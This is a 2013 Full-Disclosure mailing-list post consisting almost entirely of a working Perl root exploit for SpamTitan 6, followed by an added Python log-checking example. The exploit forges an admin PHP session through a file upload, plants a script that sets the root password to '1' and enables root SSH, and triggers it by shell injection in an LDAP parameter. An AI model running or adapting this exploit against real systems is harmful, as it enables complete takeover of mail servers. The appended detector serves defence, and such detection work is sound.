Message-Id: <20131119103528.9A052682@lists.grok.org.uk>
Date: Tue, 19 Nov 2013 10:35:28 +0000 (GMT)
From: c1088422@...ts.grok.org.uk
Subject: spamtitan 6 root exploit

# root access on spamtitan

use LWP::UserAgent;

my $url = 'http://address';
my $ua = LWP::UserAgent->new();

my $p = <<'END';
euid|i:2;uid|i:2;name|s:5:"admin";expiry|i:1500000000;locale|s:5:"en_US";admin|b:1;licenseStatus|i:3;licenseNumber|N;licenseType|N;licenseIssuedDate|N;licenseExpiryDate|N;licenseUpdateDate|N;role_id|i:1;role_name|s:13:"Administrator";role_type|N;s:5:"admin";full_admin_role|b:1;
END
$ua->post($url . '/custpdf.php',
    [ 'jaction' => 'savelogo',
      'logo' => [ undef, 'sess_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', 'Content' => $p ],
    ], 'Content_Type' => 'form-data' );

# in javascript console
# document.cookie = 'PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
# document.location = '/dashboard.php'

my $p = <<'END';
#!/bin/sh
mount -uw /
chpass -p '$1$TN65SZOW$Ayua2/j.GsQfIQb9UBeTd.' root # "1"
perl -pi -e 's/PermitRootLogin no/PermitRootLogin yes/g' /etc/ssh/sshd_config
pkill -HUP sshd
END
$ua->post($url . '/custpdf.php',
    [ 'jaction' => 'savelogo',
      'logo' => [ undef, 'cfma-mirror.sh', 'Content' => $p ],
    ], 'Content_Type' => 'form-data' );

my $p = <<'END';
/usr/local/bin/sudo /bin/cp /tmp/cfma-mirror.sh /usr/local/bin/cfma-mirror.sh;
/usr/local/bin/sudo /bin/chmod a+x /usr/local/bin/cfma-mirror.sh;
/usr/local/bin/sudo /usr/local/bin/cfma-mirror.sh;
END
$ua->post($url . '/custpdf.php',
    [ 'jaction' => 'savelogo',
      'logo' => [ undef, 'payload.sh', 'Content' => $p ],
    ], 'Content_Type' => 'form-data' );

$ua->get($url . '/aliases-x.php?getLdapDC=foo&ldapserver=;sh /tmp/payload.sh;', (
    'Cookie' => 'PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' ));

print "root shell ready with password 1\n";

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
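
Added example, not part of the original post: a log check that flags the two request shapes the script above relies on, a POST to /custpdf.php and an /aliases-x.php request whose ldapserver value carries shell metacharacters. It assumes the web server writes NCSA combined-format access logs; the log lines and the classify and find_suspicious names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: the web server writes NCSA combined-format access logs.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Characters that let a parameter value break out of a shell command line.
SHELL_META = re.compile(r'[;|&`$<>\r\n]')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = '''\
192.0.2.10 - - [19/Nov/2013:10:30:01 +0000] "GET /dashboard.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Nov/2013:10:31:12 +0000] "POST /custpdf.php HTTP/1.1" 200 17 "-" "libwww-perl/6.05"
198.51.100.7 - - [19/Nov/2013:10:31:14 +0000] "GET /aliases-x.php?getLdapDC=foo&ldapserver=%3Bsh%20/tmp/payload.sh%3B HTTP/1.1" 200 0 "-" "libwww-perl/6.05"
192.0.2.10 - - [19/Nov/2013:10:32:40 +0000] "GET /aliases-x.php?getLdapDC=foo&ldapserver=ldap.example.com HTTP/1.1" 200 64 "-" "Mozilla/5.0"
'''

def classify(line):
    """Return (client, finding) for a request matching the post, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, _status = m.groups()
    parts = urlsplit(target)
    if parts.path.endswith("/aliases-x.php"):
        # Split on '&' by hand and percent-decode, so %3B is caught like ';'.
        for pair in parts.query.split("&"):
            name, _, value = pair.partition("=")
            if unquote_plus(name) == "ldapserver" and SHELL_META.search(unquote_plus(value)):
                return client, "shell metacharacter in ldapserver"
    if parts.path.endswith("/custpdf.php") and method == "POST":
        # The body is not logged, so every upload to this endpoint needs review.
        return client, "POST to custpdf.php"
    return None

def find_suspicious(log_text):
    """Classify every line and keep the hits, in log order."""
    hits = (classify(line) for line in log_text.splitlines())
    return [hit for hit in hits if hit]

if __name__ == "__main__":
    for client, finding in find_suspicious(SAMPLE_LOG):
        print(client, finding)
```

A custpdf.php hit only marks an upload for review, since legitimate logo changes use the same endpoint; the ldapserver hit is the stronger signal.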
